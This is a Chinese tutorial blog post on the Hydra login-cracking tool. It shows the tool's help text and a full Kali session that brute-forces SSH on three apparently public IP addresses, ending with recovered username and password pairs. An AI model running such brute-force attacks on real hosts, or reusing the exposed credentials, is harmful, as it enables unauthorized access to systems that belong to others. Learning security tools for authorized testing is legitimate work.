zoukankan      html  css  js  c++  java

  • 安全工具-Hydra

    Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

    Options:
    -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
    -p PASS or -P FILE try password PASS, or load several passwords from FILE
    -C FILE colon separated "login:pass" format, instead of -L/-P options
    -M FILE list of servers to attack, one entry per line, ':' to specify port
    -t TASKS run TASKS number of connects in parallel (per host, default: 16)
    -U service module usage details
    -h more command line options (COMPLETE HELP)
    server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
    service the service to crack (see below for supported protocols)
    OPT some service modules support additional input (-U for module help)

    Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

    Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
    v3.0. The newest version is always available at http://www.thc.org/thc-hydra
    Don't use in military or secret service organizations, or for illegal purposes.

    Example: hydra -l user -P passlist.txt ftp://192.168.0.1

    # 待破解的主机列表
    root@kali:~# cat serverlist 
    189.37.178.1
189.37.178.216
189.37.178.98
    # 破解主机的ssh用户名密码
    root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t 5 -vV -o ./output.txt -e ns -M serverlist ssh
    Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 5 tasks per 3 servers, overall 64 tasks, 36 login tries (l:4/p:9), ~0 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22
[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" - 1 of 36 [child 0]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" - 1 of 36 [child 1]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" - 1 of 36 [child 2]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - 2 of 36 [child 3]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - 2 of 36 [child 4]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - 2 of 36 [child 5]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "123456" - 3 of 36 [child 6]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "123456" - 3 of 36 [child 7]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "123456" - 3 of 36 [child 8]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" - 4 of 36 [child 9]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" - 4 of 36 [child 10]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" - 4 of 36 [child 11]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" - 5 of 36 [child 12]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" - 5 of 36 [child 13]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" - 5 of 36 [child 14]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "111111" - 6 of 36 [child 3]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "111111" - 6 of 36 [child 4]
[22][ssh] host:189.37.178.98   login: root
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" - 10 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - 11 of 36 [child 2]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "123456" - 12 of 36 [child 8]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" - 13 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" - 14 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "111111" - 15 of 36 [child 5]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" - 7 of 36 [child 12]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "222222" - 8 of 36 [child 3]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "444444" - 9 of 36 [child 6]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" - 10 of 36 [child 0]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - 11 of 36 [child 9]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "123456" - 12 of 36 [child 9]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" - 16 of 36 [child 2]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" - 7 of 36 [child 7]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "222222" - 8 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "444444" - 9 of 36 [child 13]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" - 10 of 36 [child 10]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "222222" - 17 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "444444" - 18 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" - 19 of 36 [child 8]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - 20 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "123456" - 21 of 36 [child 2]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" - 13 of 36 [child 0]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" - 14 of 36 [child 9]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" - 22 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" - 23 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "111111" - 24 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" - 25 of 36 [child 8]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "111111" - 15 of 36 [child 12]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" - 16 of 36 [child 3]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "222222" - 17 of 36 [child 6]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "222222" - 26 of 36 [child 2]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - 11 of 36 [child 7]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "123456" - 12 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" - 13 of 36 [child 13]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" - 14 of 36 [child 10]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "444444" - 27 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" - 28 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - 29 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "123456" - 30 of 36 [child 8]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "444444" - 18 of 36 [child 9]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" - 19 of 36 [child 0]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" - 31 of 36 [child 2]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - 20 of 36 [child 12]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "123456" - 21 of 36 [child 3]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" - 22 of 36 [child 6]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" - 23 of 36 [child 12]
[22][ssh] host:189.37.178.1   login: pentest   password: 123456
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" - 28 of 36 [child 3]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" - 32 of 36 [child 5]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "111111" - 33 of 36 [child 11]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "222222" - 35 of 36 [child 14]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "444444" - 36 of 36 [child 8]
[STATUS] attack finished for189.37.178.98 (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - 29 of 36 [child 9]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "123456" - 30 of 36 [child 9]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" - 31 of 36 [child 0]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" - 32 of 36 [child 12]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "111111" - 33 of 36 [child 6]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "111111" - 15 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" - 16 of 36 [child 13]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "222222" - 17 of 36 [child 10]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "222222" - 35 of 36 [child 3]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "444444" - 18 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" - 19 of 36 [child 13]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - 20 of 36 [child 10]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "444444" - 36 of 36 [child 0]
[STATUS] attack finished for189.37.178.1 (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "123456" - 21 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" - 22 of 36 [child 4]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" - 23 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "111111" - 24 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" - 25 of 36 [child 7]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "222222" - 26 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "444444" - 27 of 36 [child 7]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" - 28 of 36 [child 1]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" - 29 of 36 [child 7]
[22][ssh] host:189.37.178.216   login: oracle   password: oracle
[STATUS] attack finished for189.37.178.216 (waiting for children to complete tests)
3 of 3 targets successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
    # 查看output.txt即可查看已破解成功的列表

    root@kali:~# cat output.txt 
# Hydra v8.2 run at 2017-08-06 23:14:40 on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t 5 -vV -o ./output.txt -e ns -M serverlist ssh)
[22][ssh] host: 189.37.178.98   login: root
[22][ssh] host: 189.37.178.1   login: pentest   password: 123456
[22][ssh] host: 189.37.178.216   login: oracle   password: oracle
  • 相关阅读:
    基本数据类型和包装数据类型
    编程英语多样化(长期更新)
    jdk,jre,jvm,openJdk
    英语句子频率印象流
    单击单选按钮换成图片
    标签注意事项:
    背景图片处理
    天猫导航栏
    百度地图
    两栏布局
  • 原文地址:https://www.cnblogs.com/tdcqma/p/7298397.html
Copyright © 2011-2022 走看看